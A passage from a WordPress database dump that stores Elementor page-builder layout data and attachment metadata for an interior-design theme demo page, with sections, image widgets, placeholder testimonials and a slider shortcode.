touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4236,4922,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4237,4922,'_elementor_pro_version','3.8.1'),(4238,4923,'_wp_attached_file','2023/09/56947243_2426566684042502_6812443397089918976_n.jpg'),(4239,4923,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:192;s:6:\"height\";i:192;s:4:\"file\";s:59:\"2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\";s:8:\"filesize\";i:7474;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"56947243_2426566684042502_6812443397089918976_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6105;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4240,4924,'_wp_page_template','elementor_header_footer'),(4241,4924,'_elementor_edit_mode','builder'),(4242,4924,'_elementor_template_type','wp-page'),(4243,4924,'_elementor_version','3.8.1'),(4244,4924,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":